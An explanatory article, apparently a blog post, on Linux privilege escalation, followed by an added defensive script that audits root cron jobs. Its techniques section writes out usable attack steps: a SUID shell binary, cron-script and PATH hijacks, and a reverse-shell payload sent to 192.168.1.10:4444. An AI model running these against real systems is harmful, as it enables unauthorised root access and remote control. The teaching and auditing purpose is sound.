How Hackers Climb the Ladder: Privilege Escalation Exploits, Explained

One of the most common and most frequently exploited bugs is a privilege escalation vulnerability. It's a mouthful, but in all honesty the idea is straightforward, and it's something you really should know about if you're interested in computer security.

What is privilege escalation?

Think of a computer system as a building. Not everyone has access to all rooms. A janitor may have access to the cleaning closet, but the CEO holds the keys to the executive office. Similarly, computer users have different levels of access, which are referred to as privileges.

  • Normal users can do things such as browse the web or use software.
  • Administrators (or root users) can install programs, change system settings, and read sensitive files.

Privilege escalation occurs when a user gains more access than they should have. For example, if a normal user tricks the system into granting them administrator privileges, they can now perform actions they are not allowed to perform.

Why is it a threat?

When an attacker gains admin privileges by exploiting a weakness, they can:

  • Install malware
  • Steal or delete sensitive information
  • Change security settings
  • Open backdoors for subsequent attacks

In essence, they can control the system completely.

Types of privilege escalation

  • Vertical privilege escalation: This is when an attacker climbs up the access ladder, from a regular user to an admin. This is the most dangerous type because it gives the attacker complete control.
  • Horizontal privilege escalation: This is when an attacker stays at the same access level but reaches other people's information or resources. For example, a regular user who views another user's confidential files.

Typical approaches to exploitation

SUID binaries on Linux: SUID means a program runs with the permissions of the file's owner, not those of the user who runs it. If misconfigured, it can lead to root access.

Check for SUID binaries:

# Input Command
find / -perm -4000 -type f -exec ls -lh {} + 2>/dev/null

# Output Example
-rwsr-xr-x 1 root root 133K Jan 15 2024 /usr/bin/vulnerable-bin

Exploiting a weak C binary:

// vulnerable-bin.c
#include <stdlib.h>

int main() {
   system("/bin/sh"); // runs shell with root privilege
   return 0;
}

If compiled and given SUID root:

gcc vulnerable-bin.c -o vulnerable-bin
chmod u+s vulnerable-bin

Running it as a user:

./vulnerable-bin
# Now you’re root inside the shell!

Cron job abuse: Admins often schedule tasks using cron. If it is misconfigured, it can run the attacker's code as root.

Input Command

cat /etc/cron.d/customjob

Output Example

root /tmp/myscript.sh

If /tmp/myscript.sh is writable:

echo "/bin/bash" > /tmp/myscript.sh
chmod +x /tmp/myscript.sh

Now you are root!

Poor file permissions: Sensitive files with weak permissions can be overwritten.

Input Command

ls -l /usr/local/bin/startup.sh

Output Example

-rw-rw-rw- 1 root root 124 Jan 1 00:00 /usr/local/bin/startup.sh

Now inject your payload

echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /usr/local/bin/startup.sh

PATH environment variable exploit: Some scripts run system tools such as cp, ls, or cat but do not use the full path.

#!/bin/bash
cp /etc/passwd /tmp/backup

If cp is not called with its full path (/bin/cp), the attacker can trick the script.

Create fake cp

echo '#!/bin/bash' > /tmp/cp
echo 'bash' >> /tmp/cp
chmod +x /tmp/cp

Hijack PATH

export PATH=/tmp:$PATH
./vulnerable-script.sh

How does privilege escalation happen?

Attackers often use one of the following:

  • Exploiting software bugs: A poorly written program may accidentally give users excessive access.
  • Misconfigured systems: Sometimes systems are configured in a way that puts them at risk, such as granting unintended permissions.
  • Password weaknesses: If admin passwords are weak or stored insecurely, attackers can crack them.
  • Insecure scripts or services: Scripts that run with high privileges can be taken advantage of if they are not properly secured.

Real-world example

In 2021, a bug in the Linux pkexec tool (PwnKit) allowed local users to gain root privileges. The tool is meant to run commands safely as another user, but because of the bug, anyone could take advantage of it to obtain admin rights without a password.

Preventing privilege escalation

There are many steps that individuals and organizations can take:

  • Apply patches and regular updates
  • Apply the principle of least privilege: give users access only to what they need
  • Audit permissions to identify over-privileged accounts
  • Monitor logs for anomalous behavior
  • Implement security technology such as antivirus, endpoint security, and SIEM systems
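
One way to carry out the permission audit from the list above for the cron and file-permission cases described earlier, as an added example that is not part of the original article. The function names, the finding labels and the sample cron entries are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): audit root cron jobs for writable targets.

# loose_perms PATH: true if PATH is writable by group or others, per its ls -ld mode string.
loose_perms() {
    mode=$(ls -ld -- "$1" 2>/dev/null | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;   # group-write or other-write bit set
    esac
    return 1
}

# audit_cron_dir DIR: print one finding per risky root job in cron.d-style files.
audit_cron_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        while read -r m h dom mon dow user cmd rest; do
            case "$m" in ''|'#'*|*=*) continue ;; esac   # blank, comment, VAR=value
            case "$m" in @*) user=$h; cmd=$dom ;; esac    # "@reboot user command" form
            [ "$user" = root ] || continue
            case "$cmd" in
                /*) ;;
                *) echo "RELATIVE-COMMAND $f: $cmd"; continue ;;  # resolved through PATH
            esac
            loose_perms "$cmd" && echo "WRITABLE-TARGET $f: $cmd"
            d=$(dirname "$cmd")
            loose_perms "$d" && echo "WRITABLE-DIR $f: $d"
        done < "$f"
    done
    return 0
}

# make_fixture: build constructed sample cron entries and scripts in a temp dir; print its path.
make_fixture() {
    t=$(mktemp -d) && mkdir "$t/cron.d" "$t/bin" && chmod 755 "$t/bin"
    printf '#!/bin/sh\n' > "$t/bin/myscript.sh"; chmod 666 "$t/bin/myscript.sh"
    printf '#!/bin/sh\n' > "$t/bin/safe.sh";     chmod 755 "$t/bin/safe.sh"
    cat > "$t/cron.d/customjob" <<EOF
# constructed sample entries
MAILTO=root
* * * * * root $t/bin/myscript.sh
0 3 * * * root $t/bin/safe.sh --nightly
@reboot root cleanup.sh
*/5 * * * * www-data $t/bin/myscript.sh
EOF
    echo "$t"
}

fx=$(make_fixture); audit_cron_dir "$fx/cron.d"; rm -rf "$fx"
```

On a real host, point audit_cron_dir at /etc/cron.d; directories with the sticky bit, such as /tmp, are still reported as WRITABLE-DIR so the job's location can be reviewed.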

Final thoughts

Privilege escalation flaws are like open doors in a fortified building. Even if everything else is locked, one open door can give an attacker complete control. This is why finding and fixing these weaknesses is top of mind for cybersecurity experts.
